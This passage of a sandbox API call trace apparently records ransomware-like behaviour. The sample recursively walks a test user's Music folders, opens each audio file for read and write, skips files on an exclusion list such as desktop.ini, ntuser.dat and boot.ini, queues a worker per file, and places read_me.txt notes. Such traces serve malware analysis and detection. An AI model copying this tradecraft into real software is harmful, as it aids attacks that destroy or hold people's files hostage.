(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x940 [0076.168] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0076.168] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0076.168] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0076.168] CloseHandle (hObject=0x940) returned 1 [0076.168] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d43b2a0, ftCreationTime.dwHighDateTime=0x1d4d549, ftLastAccessTime.dwLowDateTime=0xe82fc560, ftLastAccessTime.dwHighDateTime=0x1d4d1ce, ftLastWriteTime.dwLowDateTime=0xe82fc560, ftLastWriteTime.dwHighDateTime=0x1d4d1ce, nFileSizeHigh=0x0, nFileSizeLow=0x54ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lsf0tqH.m4a", cAlternateFileName="")) returned 1 [0076.168] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lsf0tqH.m4a") returned 51 [0076.168] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\lsf0tqH.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lsf0tqh.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x940 [0076.169] StrStrW (lpFirst="lsf0tqh.m4a", lpSrch="read_me.txt") returned 0x0 [0076.169] StrStrW (lpFirst="lsf0tqh.m4a", lpSrch="autoexec.bat") returned 0x0 [0076.169] StrStrW (lpFirst="lsf0tqh.m4a", lpSrch="desktop.ini") returned 0x0 [0076.169] StrStrW (lpFirst="lsf0tqh.m4a", lpSrch="autorun.inf") returned 0x0 [0076.169] StrStrW (lpFirst="lsf0tqh.m4a", lpSrch="ntuser.dat") returned 0x0 [0076.169] StrStrW (lpFirst="lsf0tqh.m4a", lpSrch="iconcache.db") returned 0x0 [0076.169] StrStrW (lpFirst="lsf0tqh.m4a", lpSrch="bootsect.bak") returned 0x0 [0076.169] StrStrW (lpFirst="lsf0tqh.m4a", lpSrch="boot.ini") returned 0x0 [0076.169] StrStrW (lpFirst="lsf0tqh.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0076.169] StrStrW (lpFirst="lsf0tqh.m4a", lpSrch="thumbs.db") returned 0x0 [0076.169] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 112 [0076.169] QueueUserWorkItem (Function=0x404e00, Context=0x940, Flags=0x0) returned 1 [0076.169] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24822120, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24822120, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24822120, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.169] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\read_me.txt") returned 51 [0076.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x944 [0076.169] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.169] CloseHandle (hObject=0x944) returned 1 [0076.169] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a9a6970, ftCreationTime.dwHighDateTime=0x1d4d3db, ftLastAccessTime.dwLowDateTime=0x98e2c0b0, ftLastAccessTime.dwHighDateTime=0x1d4c752, ftLastWriteTime.dwLowDateTime=0x98e2c0b0, ftLastWriteTime.dwHighDateTime=0x1d4c752, nFileSizeHigh=0x0, nFileSizeLow=0x66fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yIEkfQCxcOzoyh.m4a", cAlternateFileName="YIEKFQ~1.M4A")) returned 1 [0076.169] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\yIEkfQCxcOzoyh.m4a") returned 58 [0076.169] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\yIEkfQCxcOzoyh.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yiekfqcxcozoyh.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x944 [0076.170] StrStrW (lpFirst="yiekfqcxcozoyh.m4a", lpSrch="read_me.txt") returned 0x0 [0076.170] StrStrW (lpFirst="yiekfqcxcozoyh.m4a", lpSrch="autoexec.bat") returned 0x0 [0076.170] StrStrW (lpFirst="yiekfqcxcozoyh.m4a", lpSrch="desktop.ini") returned 0x0 [0076.170] StrStrW (lpFirst="yiekfqcxcozoyh.m4a", lpSrch="autorun.inf") returned 0x0 [0076.170] StrStrW (lpFirst="yiekfqcxcozoyh.m4a", lpSrch="ntuser.dat") returned 0x0 [0076.170] StrStrW (lpFirst="yiekfqcxcozoyh.m4a", lpSrch="iconcache.db") returned 0x0 [0076.170] StrStrW (lpFirst="yiekfqcxcozoyh.m4a", lpSrch="bootsect.bak") returned 0x0 [0076.170] StrStrW (lpFirst="yiekfqcxcozoyh.m4a", lpSrch="boot.ini") returned 0x0 [0076.170] StrStrW (lpFirst="yiekfqcxcozoyh.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0076.170] StrStrW (lpFirst="yiekfqcxcozoyh.m4a", lpSrch="thumbs.db") returned 0x0 [0076.170] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 113 [0076.170] QueueUserWorkItem (Function=0x404e00, Context=0x944, Flags=0x0) returned 1 [0076.170] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a9a6970, ftCreationTime.dwHighDateTime=0x1d4d3db, ftLastAccessTime.dwLowDateTime=0x98e2c0b0, ftLastAccessTime.dwHighDateTime=0x1d4c752, ftLastWriteTime.dwLowDateTime=0x98e2c0b0, ftLastWriteTime.dwHighDateTime=0x1d4c752, nFileSizeHigh=0x0, nFileSizeLow=0x66fb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yiekfqcxcozoyh.m4a", cAlternateFileName="YIEKFQ~1.M4A")) returned 0 [0076.170] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0076.170] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\read_me.txt") returned 51 [0076.170] GetProcessHeap () returned 0x4f10000 [0076.170] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b700c0 | out: hHeap=0x4f10000) returned 1 [0076.170] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 67 [0076.170] GetProcessHeap () returned 0x4f10000 [0076.170] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8cd1078 | out: hHeap=0x4f10000) returned 1 [0076.170] GetProcessHeap () returned 0x4f10000 [0076.170] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b700c0 [0076.170] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\*") returned 56 [0076.170] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b394170, ftCreationTime.dwHighDateTime=0x1d4ca18, ftLastAccessTime.dwLowDateTime=0x24bb4220, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24bb4220, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0076.171] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\.") returned 56 [0076.171] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b394170, ftCreationTime.dwHighDateTime=0x1d4ca18, ftLastAccessTime.dwLowDateTime=0x24bb4220, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24bb4220, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.171] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\..") returned 57 [0076.171] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0bda90, ftCreationTime.dwHighDateTime=0x1d4cfbb, ftLastAccessTime.dwLowDateTime=0x1be9f240, ftLastAccessTime.dwHighDateTime=0x1d4ce96, ftLastWriteTime.dwLowDateTime=0x1be9f240, ftLastWriteTime.dwHighDateTime=0x1d4ce96, nFileSizeHigh=0x0, nFileSizeLow=0x177d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BSTXsZ.mp3", cAlternateFileName="")) returned 1 [0076.171] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\BSTXsZ.mp3") returned 65 [0076.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\BSTXsZ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\bstxsz.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x948 [0076.171] StrStrW (lpFirst="bstxsz.mp3", lpSrch="read_me.txt") returned 0x0 [0076.171] StrStrW (lpFirst="bstxsz.mp3", lpSrch="autoexec.bat") returned 0x0 [0076.171] StrStrW (lpFirst="bstxsz.mp3", lpSrch="desktop.ini") returned 0x0 [0076.171] StrStrW (lpFirst="bstxsz.mp3", lpSrch="autorun.inf") returned 0x0 [0076.171] StrStrW (lpFirst="bstxsz.mp3", lpSrch="ntuser.dat") returned 0x0 [0076.171] StrStrW (lpFirst="bstxsz.mp3", lpSrch="iconcache.db") returned 0x0 [0076.171] StrStrW (lpFirst="bstxsz.mp3", lpSrch="bootsect.bak") returned 0x0 [0076.171] StrStrW (lpFirst="bstxsz.mp3", lpSrch="boot.ini") returned 0x0 [0076.171] StrStrW (lpFirst="bstxsz.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0076.171] StrStrW (lpFirst="bstxsz.mp3", lpSrch="thumbs.db") returned 0x0 [0076.171] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 114 [0076.171] QueueUserWorkItem (Function=0x404e00, Context=0x948, Flags=0x0) returned 1 [0076.171] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x884831a0, ftCreationTime.dwHighDateTime=0x1d4c66b, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H2vk_", cAlternateFileName="")) returned 1 [0076.171] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_") returned 60 [0076.171] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15ae90, ftCreationTime.dwHighDateTime=0x1d4c681, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rd8rDpgMK_O U_ RO", cAlternateFileName="RD8RDP~1")) returned 1 [0076.171] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\rd8rDpgMK_O U_ RO") returned 72 [0076.171] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24bb4220, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24bb4220, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24bb4220, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.171] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\read_me.txt") returned 66 [0076.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94c [0076.172] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.172] CloseHandle (hObject=0x94c) returned 1 [0076.172] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b3a0d90, ftCreationTime.dwHighDateTime=0x1d4c5bf, ftLastAccessTime.dwLowDateTime=0xfc8619c0, ftLastAccessTime.dwHighDateTime=0x1d4d08d, ftLastWriteTime.dwLowDateTime=0xfc8619c0, ftLastWriteTime.dwHighDateTime=0x1d4d08d, nFileSizeHigh=0x0, nFileSizeLow=0x8a6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SbWQphpdQ.m4a", cAlternateFileName="SBWQPH~1.M4A")) returned 1 [0076.172] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\SbWQphpdQ.m4a") returned 68 [0076.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\SbWQphpdQ.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\sbwqphpdq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x94c [0076.172] StrStrW (lpFirst="sbwqphpdq.m4a", lpSrch="read_me.txt") returned 0x0 [0076.172] StrStrW (lpFirst="sbwqphpdq.m4a", lpSrch="autoexec.bat") returned 0x0 [0076.172] StrStrW (lpFirst="sbwqphpdq.m4a", lpSrch="desktop.ini") returned 0x0 [0076.172] StrStrW (lpFirst="sbwqphpdq.m4a", lpSrch="autorun.inf") returned 0x0 [0076.172] StrStrW (lpFirst="sbwqphpdq.m4a", lpSrch="ntuser.dat") returned 0x0 [0076.172] StrStrW (lpFirst="sbwqphpdq.m4a", lpSrch="iconcache.db") returned 0x0 [0076.172] StrStrW (lpFirst="sbwqphpdq.m4a", lpSrch="bootsect.bak") returned 0x0 [0076.172] StrStrW (lpFirst="sbwqphpdq.m4a", lpSrch="boot.ini") returned 0x0 [0076.172] StrStrW (lpFirst="sbwqphpdq.m4a", lpSrch="ntuser.dat.log") returned 0x0 [0076.172] StrStrW (lpFirst="sbwqphpdq.m4a", lpSrch="thumbs.db") returned 0x0 [0076.172] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 115 [0076.172] QueueUserWorkItem (Function=0x404e00, Context=0x94c, Flags=0x0) returned 1 [0076.172] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe7eb130, ftCreationTime.dwHighDateTime=0x1d4cee7, ftLastAccessTime.dwLowDateTime=0x24bb4220, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24bb4220, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmMLxSh", cAlternateFileName="")) returned 1 [0076.172] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\wmMLxSh") returned 62 [0076.172] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfe7eb130, ftCreationTime.dwHighDateTime=0x1d4cee7, ftLastAccessTime.dwLowDateTime=0x24bb4220, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24bb4220, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmMLxSh", cAlternateFileName="")) returned 0 [0076.172] FindClose (in: hFindFile=0x7cfe9e8 | out: hFindFile=0x7cfe9e8) returned 1 [0076.173] wnsprintfW (in: pszDest=0x8b700c0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\read_me.txt") returned 66 [0076.173] GetProcessHeap () returned 0x4f10000 [0076.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b700c0 | out: hHeap=0x4f10000) returned 1 [0076.173] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 68 [0076.173] GetProcessHeap () returned 0x4f10000 [0076.173] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8cf1088 | out: hHeap=0x4f10000) returned 1 [0076.173] GetProcessHeap () returned 0x4f10000 [0076.173] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8cf1088 [0076.173] wnsprintfW (in: pszDest=0x8cf1088, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\*") returned 62 [0076.173] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\*", lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x884831a0, ftCreationTime.dwHighDateTime=0x1d4c66b, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe9e8 [0076.173] wnsprintfW (in: pszDest=0x8cf1088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\.") returned 62 [0076.173] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x884831a0, ftCreationTime.dwHighDateTime=0x1d4c66b, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.173] wnsprintfW (in: pszDest=0x8cf1088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\..") returned 63 [0076.173] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e70cfd0, ftCreationTime.dwHighDateTime=0x1d4d0d5, ftLastAccessTime.dwLowDateTime=0xd4fb1e80, ftLastAccessTime.dwHighDateTime=0x1d4d3dc, ftLastWriteTime.dwLowDateTime=0xd4fb1e80, ftLastWriteTime.dwHighDateTime=0x1d4d3dc, nFileSizeHigh=0x0, nFileSizeLow=0xef4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GfZaeOxJ.wav", cAlternateFileName="")) returned 1 [0076.173] wnsprintfW (in: pszDest=0x8cf1088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\GfZaeOxJ.wav") returned 73 [0076.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\GfZaeOxJ.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\gfzaeoxj.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x950 [0076.173] StrStrW (lpFirst="gfzaeoxj.wav", lpSrch="read_me.txt") returned 0x0 [0076.173] StrStrW (lpFirst="gfzaeoxj.wav", lpSrch="autoexec.bat") returned 0x0 [0076.173] StrStrW (lpFirst="gfzaeoxj.wav", lpSrch="desktop.ini") returned 0x0 [0076.173] StrStrW (lpFirst="gfzaeoxj.wav", lpSrch="autorun.inf") returned 0x0 [0076.173] StrStrW (lpFirst="gfzaeoxj.wav", lpSrch="ntuser.dat") returned 0x0 [0076.173] StrStrW (lpFirst="gfzaeoxj.wav", lpSrch="iconcache.db") returned 0x0 [0076.173] StrStrW (lpFirst="gfzaeoxj.wav", lpSrch="bootsect.bak") returned 0x0 [0076.174] StrStrW (lpFirst="gfzaeoxj.wav", lpSrch="boot.ini") returned 0x0 [0076.174] StrStrW (lpFirst="gfzaeoxj.wav", lpSrch="ntuser.dat.log") returned 0x0 [0076.174] StrStrW (lpFirst="gfzaeoxj.wav", lpSrch="thumbs.db") returned 0x0 [0076.174] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 116 [0076.174] QueueUserWorkItem (Function=0x404e00, Context=0x950, Flags=0x0) returned 1 [0076.174] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24b8e0c0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x24b8e0c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x24b8e0c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.174] wnsprintfW (in: pszDest=0x8cf1088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\read_me.txt") returned 72 [0076.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x954 [0076.174] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.174] CloseHandle (hObject=0x954) returned 1 [0076.174] FindNextFileW (in: hFindFile=0x7cfe9e8, lpFindFileData=0x728fb60 | out: lpFindFileData=0x728fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f9b9f10, ftCreationTime.dwHighDateTime=0x1d4d148, ftLastAccessTime.dwLowDateTime=0xef2e0740, ftLastAccessTime.dwHighDateTime=0x1d4ce00, ftLastWriteTime.dwLowDateTime=0xef2e0740, ftLastWriteTime.dwHighDateTime=0x1d4ce00, nFileSizeHigh=0x0, nFileSizeLow=0x18c42, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SzLBr.m4a", cAlternateFileName="")) returned 1 [0076.174] wnsprintfW (in: pszDest=0x8cf1088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\SzLBr.m4a") returned 70 [0076.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3irpEEnGfRfssd\\H2vk_\\SzLBr.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\3irpeengfrfssd\\h2vk_\\szlbr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x954 [0076.174] StrStrW (lpFirst="szlbr.m4a", lpSrch="read_me.txt") returned 0x0 [0076.174] StrStrW 